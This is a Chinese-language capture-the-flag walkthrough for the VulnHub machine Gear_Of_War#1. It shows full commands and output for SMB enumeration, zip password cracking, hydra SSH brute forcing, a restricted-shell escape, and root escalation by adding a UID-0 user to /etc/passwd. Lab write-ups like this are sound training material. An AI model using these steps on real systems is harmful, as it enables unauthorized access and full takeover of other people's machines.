14--VulnHub 靶机系列之Gear_Of_War#1
靶机下载地址:
https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova
kali机(VMware)两张网卡:
第一张网卡使用VM0(桥接模式)-桥接到VirtualBox Host-Only Ethernet Adapter
第二张网卡使用NAT模式--用于访问网络
信息收集
kali机eth0的IP:192.168.56.129
扫描靶机的IP地址
arp-scan -l
通过靶机的MAC地址判断其IP
得到靶机的IP:192.168.56.129
扫描靶机开放的端口和服务
nmap -sS -sV -A -T4 -p- 192.168.56.129
┌──(root㉿kali)-[~] └─# nmap -sS -sV -T4 -A -p- 192.168.56.101 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 06:21 EST Nmap scan report for 192.168.56.101 Host is up (0.00047s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 09:03:8d:1f:f8:c9:d4:b4:43:b3:c3:73:12:ba:95:e1 (RSA) | 256 1b:a0:5f:3e:a2:6b:22:5a:81:c3:18:7e:5b:fc:d2:bd (ECDSA) |_ 256 18:1f:0c:d6:e7:2a:f5:5c:45:cb:8d:79:70:31:4b:7a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST) MAC Address: 08:00:27:C6:C7:7B (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: gears_of_war | NetBIOS computer name: GEARS_OF_WAR\x00 | Domain name: \x00 | FQDN: gears_of_war |_ System time: 2024-12-09T11:22:09+00:00 | smb2-time: | date: 2024-12-09T11:22:09 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: -2s, deviation: 0s, median: -2s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) TRACEROUTE HOP RTT ADDRESS 1 0.47 ms 192.168.56.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ Nmap done: 1 IP address (1 host up) scanned in 19.07 seconds
开放端口:22、80、139、445
扫描80端口下存在的目录和文件
方法一:dirb http://192.168.56.101
+ http://192.168.56.101/index.html (CODE:200|SIZE:200) + http://192.168.56.101/robots.txt (CODE:200|SIZE:64) + http://192.168.56.101/server-status (CODE:403|SIZE:279)
只有robots和index.html
方法二:dirsearch -u http://192.168.56.101
结果和方法一一致,只不过多了没用的隐藏文件
方法三:gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt -x .php,.txt,.html,.zip
要先获得SecLists-master,可以在github下载得到
/dom.html /index.html /marcus.html /robots.txt
得到四个,所以我们一般使用gobuster进行扫描web下的目录和文件
浏览器访问得到的URL
在robots.txt下发现重要内容
/marcus.html /dom.html /cole.html /baird.html /acarmine.html
这五个文件访问后,得到的是图片,疑似是外国电影中的虚拟人物,可能要从图片中得到什么内容或是查看源码
在index.html中发现
一张类似游戏中一个场景的图片
Apache2 Ubuntu Default Page 网页
看不出什么内容
回到扫描出的端口中
通过nmap -sS -sV -A -T4 -p- 192.168.56.100
得到开放的端口22(ssh)、80(http)、139,445(Samba)
Samba 服务的主要功能: 文件共享(File Sharing): Samba 允许 Linux/Unix 系统和 Windows 系统之间共享文件。例如,你可以在 Linux 系统上设置一个文件夹并让 Windows 机器访问该文件夹,就像 Windows 本地的共享文件夹一样。 打印机共享(Printer Sharing): Samba 还支持将打印机从 Linux/Unix 机器共享到 Windows 系统,使 Windows 用户能够通过 Samba 共享的打印机进行打印。 Windows 网络集成: Samba 支持 Windows 的 工作组 和 域(Domain)模式,允许 Linux/Unix 机器加入到 Windows 的网络环境中,实现身份验证、访问控制等功能。 例如,你可以让 Linux 机器成为一个 Windows 域的成员,进行域级别的认证和资源访问控制。 提供 Windows 网络功能: Samba 还支持 NetBIOS 和 DNS,使得基于 Windows 的网络功能(如计算机名解析、资源共享)在 Linux/Unix 系统上得以实现。
由于前面未得到暴露出的权限信息
这里是大概率是要进行samba服务的渗透
漏洞利用
SMB探测
由于没有用户名和密码,所以不进行下面的命令去列出共享的目录和文件
smbclient -L //192.168.56.101 -U ""
发现smb
smbmap -H 192.168.56.101
[+] IP: 192.168.56.101:445 Name: 192.168.56.101 Status: Authenticated Disk Permissions Comment ---- ----------- ------- LOCUS_LAN$ READ ONLY LOCUST FATHER IPC$ NO ACCESS IPC Service (gears_of_war server (Samba, Ubuntu))
得到文件夹LOCUS_LAN$
访问smb
smbclient //192.168.56.101/LOCUS_LAN$
┌──(root㉿kali)-[~] └─# smbclient //192.168.56.101/LOCUS_LAN$ Password for [WORKGROUP\root]: Anonymous login successful Try "help" to get a list of possible commands. smb: \>
help
ls
get msg_horda.zip
get SOS.txt quit
smb: \> get msg_horda.zip getting file \msg_horda.zip of size 332 as msg_horda.zip (108.1 KiloBytes/sec) (average 108.1 KiloBytes/sec) smb: \> get SOS.txt getting file \SOS.txt of size 198 as SOS.txt (64.5 KiloBytes/sec) (average 86.3 KiloBytes/sec) smb: \>
获取了一个压缩包一个文件
生成密码字典
获得提醒
cat SOS.txt
This is a message for the Delta Team. I found a file that contains a password to free ........ oh no they here!!!!!!!!!!, i must protect myself, please try to get the password!! [@%%,] -Hoffman.
这是给 Delta Team 的一条信息。 我找到一个文件,里面包含了解锁……的密码……哦不,他们来了!!!!! 我必须保护自己,请你们试着找到密码!! [@%%,] Hoffman。
尝试解压zip文件
unzip msg_horda.zip
┌──(root㉿kali)-[~] └─# unzip msg_horda.zip Archive: msg_horda.zip [msg_horda.zip] key.txt password:
没有密码!!!
下面就是使用工具进行爆破zip解压需要的密码了!!
使用crunch生成字典
crunch 4 4 -t @%%, -o list.txt
┌──(root㉿kali)-[~] └─# crunch 4 4 -t @%%, -o list.txt Crunch will now generate the following amount of data: 338000 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 67600 crunch: 100% completed generating output
fcrackzip -D -u -p list.txt msg_horda.zip
┌──(root㉿kali)-[~] └─# fcrackzip -D -u -p list.txt msg_horda.zip PASSWORD FOUND!!!!: pw == r44M
得到密码解压密码:r44M
解压zip文件获取信息
┌──(root㉿kali)-[~] └─# unzip msg_horda.zip Archive: msg_horda.zip [msg_horda.zip] key.txt password: inflating: key.txt
得到一个key.txt文件
┌──(root㉿kali)-[~] └─# cat key.txt "Vamos a atacar a los humanos con toda nuestras hordas, por eso puse en prision a el hombre mas peligroso que tenian, por lo que sin el son debiles." [[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]] -General RAAM.
得到3_d4y
疑似是一个密码,这里猜测是ssh的密码
由于前面没有得到什么关键信息
直接使用暴力破解ssh用户
探测ssh
暴力猜解账户
cd /usr/share/wordlists
ls
gunzip rockyou.txt.gz
┌──(root㉿kali)-[~] └─# cd /usr/share/wordlists ┌──(root㉿kali)-[/usr/share/wordlists] └─# ls amass dnsmap.txt john.lst nmap.lst SecLists-master.zip wifite.txt dirb fasttrack.txt legion rockyou.txt.gz sqlmap.txt dirbuster fern-wifi metasploit SecLists-master wfuzz ┌──(root㉿kali)-[/usr/share/wordlists] └─# gunzip rockyou.txt.gz
cd
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
┌──(root㉿kali)-[~] └─# hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-09 07:55:37 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task [DATA] attacking ssh://192.168.56.101:22/ [STATUS] 352.00 tries/min, 352 tries in 00:01h, 14344051 to do in 679:11h, 12 active [22][ssh] host: 192.168.56.101 login: marcus password: 3_d4y
得到账户 marcus/3_d4y
权限提升
登陆ssh
ssh marcus@192.168.56.101
3_d4y
marcus@gears_of_war:~$
ls -al
cd jail
marcus@gears_of_war:~$ ls -al total 40 drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 . drwxr-xr-x 4 root root 4096 Oct 17 2019 .. -rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history -rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout -rwxrwxrwx 1 marcus marcus 3771 Apr 4 2018 .bashrc drwxrwxrwx 2 marcus marcus 4096 Oct 16 2019 .cache drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .gnupg drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 jail drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .local -rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile
只有一个文件夹jail,访问被限制了!!!
marcus@gears_of_war:~$ cd jail -rbash: cd: restricted marcus@gears_of_war:~$ ls
绕过低权限用户的shell的配置文件
ssh marcus@192.168.56.101 -t "bash -noprofile"
通过 SSH 登录到 192.168.56.101 主机上的 marcus 用户,并启动一个新的 Bash shell,且不加载任何用户的配置文件。-t 选项确保了命令在交互式环境下正常工作。这样做通常用于绕过某些限制性 shell 设置,确保以更干净、更受控制的方式进入 Bash 环境。
3_d4y
marcus@gears_of_war:~$ cd jail/ marcus@gears_of_war:~/jail$ ls marcus@gears_of_war:~/jail$ ls -al total 8 drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 . drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 ..
啥都没有,被耍了!
查找具有 setuid 权限的可执行文件
find / -type f -perm -u=s 2>/dev/null
/usr/bin/passwd
一个重要的漏洞,passwd有setuid权限,直接进行创建用户!
利用passwd创建用户
openssl passwd -1 -salt abc 123
marcus@gears_of_war:~/jail$ openssl passwd -1 -salt abc 123 $1$abc$98/EDagBiz63dxD3fhRFk1 marcus@gears_of_war:~/jail$
添加用户和密码及其他信息至passwd文件中
cat /etc/passwd > /tmp/passwd2
vim /tmp/passwd2 abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/root:/bin/bash
marcus@gears_of_war:~/jail$ cat /etc/passwd > /tmp/passwd2 marcus@gears_of_war:~/jail$ vim /tmp/passwd2 marcus@gears_of_war:~/jail$ cat /tmp/passwd2 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/bin/bash marcus@gears_of_war:~/jail$
cp /tmp/passwd2 /etc/passwd
切换用户
su abc
123
whoami
pwd
id
cd /root
ls -al
marcus@gears_of_war:~/jail$ su abc Password: # id uid=0(root) gid=0(root) groups=0(root) # whoami root # pwd /home/marcus/jail # cd /root # ks sh: 5: ks: not found # ls # ls -al total 52 drwx------ 6 root root 4096 Oct 17 2019 . drwxr-xr-x 24 root root 4096 Oct 16 2019 .. -rw------- 1 root root 216 Oct 17 2019 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc drwx------ 2 root root 4096 Oct 17 2019 .cache -rw-r--r-- 1 root root 12732 Oct 17 2019 .flag.txt drwx------ 3 root root 4096 Oct 17 2019 .gnupg drwxr-xr-x 3 root root 4096 Oct 16 2019 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwx------ 2 root root 4096 Oct 16 2019 .ssh # cat .flag.txt
获得flagcat .flag.txt
.flag.txt内容
# cat .flag.txt .,*,, .*(((#((((*,. ,*/,,,..*/(((/*/#(. .*//*((####(/,,*,/(#(* ..,*//((*, ....**/**(##########%#(*,*(#/. .*/((#######((*. ..,*..*,,**///*,,,/(################(//*,. .,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,. .,/(((/((#(##########(,.,,,,//((/*/(####(##################(///. ,*(##(#((((/#######%#(###(##################################/((* .*((#/*/(/(#############(#######################(#((#(######*((* .*((((#####################################(########((######**/*. ,/##((###########################################(##########*,(///. *(((###%#####################################################(,****, .,/(##(#######%%#####%############(#(############################(***,. .**(##%##%###(#####((###############%######//,,*/((###################(,... ./(##((##%#(##(/(((((##########################/*. *(############%####(,. . **(####((###((///####%######################%####(*, ,((###############* .,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,. ..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*. .,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/ ,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((. .,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####* .**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####( .,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##, ,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(* ,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(* .*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/ ,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(. ./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(* .*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/ ,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#( /(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/ /#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/ (###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/ ./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/, .*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//. .*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/* ,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/, ,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/**,. .,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/***, ..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,. ,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,. *(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,. ..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,.. ...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,. ..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,. .,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(* .,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**. .,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/. ..,,********,,((####################(#(///******/*///(((###########%#####%###(/. . ,*******/(###################((#################################(###/, .,,,/**/##################(#######(#########################((####, .*/*/#######################################################(#(. .//############((((########(#######################((####((/*. . ,(##########(((((((###########################((###(((((((*, . .((############((((###(*,,*//*///*//(##%############((//**/*, .*(######(#(#######(**, .*(#######((((/(//**,, . ,*/#####((((((##/, .*. ./###((((,. .,.,,//#########*.. . ,, /((/(/*, . . . ,../(#####(*/ . . .. * .. .,/(#*. . . .,../#, . . . . . .#/ . . .. .#/ . #/ . .(/ . /# . ,(. . . .. ,(( . Congratulation you got out of the jail and finish this Episode#1! Please share and support me on twitter! Twitter: @sir809 #
原文地址:https://blog.csdn.net/2302_76838247/article/details/144358228
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!